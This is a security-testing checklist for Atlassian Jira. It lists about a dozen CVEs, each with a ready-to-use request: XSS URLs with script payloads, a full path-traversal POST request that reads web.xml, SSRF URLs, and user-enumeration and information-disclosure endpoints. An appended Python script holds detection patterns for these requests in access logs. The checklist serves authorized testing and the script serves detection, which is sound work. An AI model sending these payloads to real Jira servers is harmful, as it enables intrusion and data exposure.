-
CVE-2019-3402 (XSS)
- 1. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
- 2. Observe that the payload is executed.
-
CVE-2019-3396 (Path Traversal)
- 1. Try the POST request below against the JIRA target.
- 2. Request (a blank line separates the headers from the body):
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
-
CVE-2019-11581 (Template Injection)
- 1. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
- 2. Try the SSTI payloads.
-
CVE-2020-14179 (Information Disclosure)
- 1. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
- 2. It leaks information about custom fields, custom SLA, etc.
-
CVE-2020-14178 (Project Key Enumeration)
- 1. Navigate to <JIRA_URL>/browse.<project_key>
- 2. Observe the difference in the error message for a valid vs. an invalid project key. Apart from enumeration, you can often get unauthenticated access to the project if the protections are not in place.
-
CVE-2020-14181 (User Enumeration)
- 1. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<username>
- 2. Observe the difference in the response when a valid vs. an invalid username is provided.
-
CVE-2019-3403 (User Enumeration)
- 1. Navigate to <JIRA_URL>/rest/api/2/user/picker?query=<user_name_here>
- 2. Observe the difference in the response when a valid vs. an invalid user is queried.
-
CVE-2019-8442 (Sensitive Information Disclosure)
- 1. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- 2. Observe that the pom.xml file is accessible.
-
CVE-2019-8449 (User Information Disclosure)
- 1. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
- 2. Observe that user-related information is returned.
-
CVE-2019-8451 (SSRF)
- 1. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
-
CVE-2018-20824 (XSS)
- 1. Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
- 2. Observe that the payload will be executed.
-
CVE-2017-9506 (SSRF)
- 1. Navigate to <JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_payload_here>
-
Use the Nuclei scanner by ProjectDiscovery to automate detection of most of these CVEs.
- MindMap Created By: @harshbothra_
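
From the defender's side, the request paths in this checklist double as access-log signatures. The following is an added example, not part of the original mindmap: it scans web access log lines for the endpoints listed above and groups hits by client. The rule query conditions, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# (CVE id, regex on decoded path, regex on decoded query or None). Paths are from
# the checklist; the query conditions are assumptions added to reduce noise.
RULES = [
    ("CVE-2019-3402", r"/secure/ConfigurePortalPages!default\.jspa$", r"searchOwnerUserName=[^&]*[<>]"),
    ("CVE-2019-3396", r"/rest/tinymce/1/macro/preview$", None),
    ("CVE-2019-11581", r"/secure/ContactAdministrators!default\.jspa$", None),
    ("CVE-2020-14179", r"/secure/QueryComponent!Default\.jspa$", None),
    ("CVE-2020-14178", r"/browse\.[^/]+$", None),
    ("CVE-2020-14181", r"/secure/ViewUserHover\.jspa$", r"username="),
    ("CVE-2019-3403", r"/rest/api/2/user/picker$", r"query="),
    ("CVE-2019-8442", r"/s/[^/]+/_/META-INF/", None),
    ("CVE-2019-8449", r"/rest/api/[^/]+/groupuserpicker$", None),
    ("CVE-2019-8451", r"/plugins/servlet/gadgets/makeRequest$", r"url=[^&]*@"),
    ("CVE-2018-20824", r"/plugins/servlet/Wallboard/?$", r"cyclePeriod=(?!\d+(&|$))"),
    ("CVE-2017-9506", r"/plugins/servlet/oauth/users/icon-uri$", r"consumerUri="),
]
# Common/combined log format: client ... "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(\S+) .*?"\S+ (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, status, [CVE ids]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, uri, status = m.groups()
    u = urlsplit(uri)
    path, query = unquote(u.path), unquote(u.query)  # decode before matching
    hits = [cve for cve, p, q in RULES
            if re.search(p, path, re.I) and (q is None or re.search(q, query, re.I))]
    return client, int(status), hits

def summarize(lines):
    """Map each client to the sorted CVE ids whose request pattern it sent."""
    seen = {}
    for r in filter(None, map(classify, lines)):
        if r[2]:
            seen.setdefault(r[0], set()).update(r[2])
    return {client: sorted(cves) for client, cves in seen.items()}

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2020:13:55:36 +0000] "GET /s/x/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2020:13:55:37 +0000] "GET /jira/secure/ViewUserHover.jspa?username=admin HTTP/1.1" 200 812',
    '198.51.100.9 - - [10/Oct/2020:13:56:01 +0000] "GET /plugins/servlet/Wallboard/?dashboardId=10000&cyclePeriod=30 HTTP/1.1" 200 2048',
    '192.0.2.44 - - [10/Oct/2020:13:57:12 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https%3A%2F%2Fjira.example%3A1337%40example.com HTTP/1.1" 200 300',
]
```

Rules with no query condition match on the path alone, so a hit on an endpoint such as ContactAdministrators marks a request for review, not a confirmed exploit attempt. Access logs do not record request bodies, so the CVE-2019-3396 rule can only flag that the preview endpoint was requested.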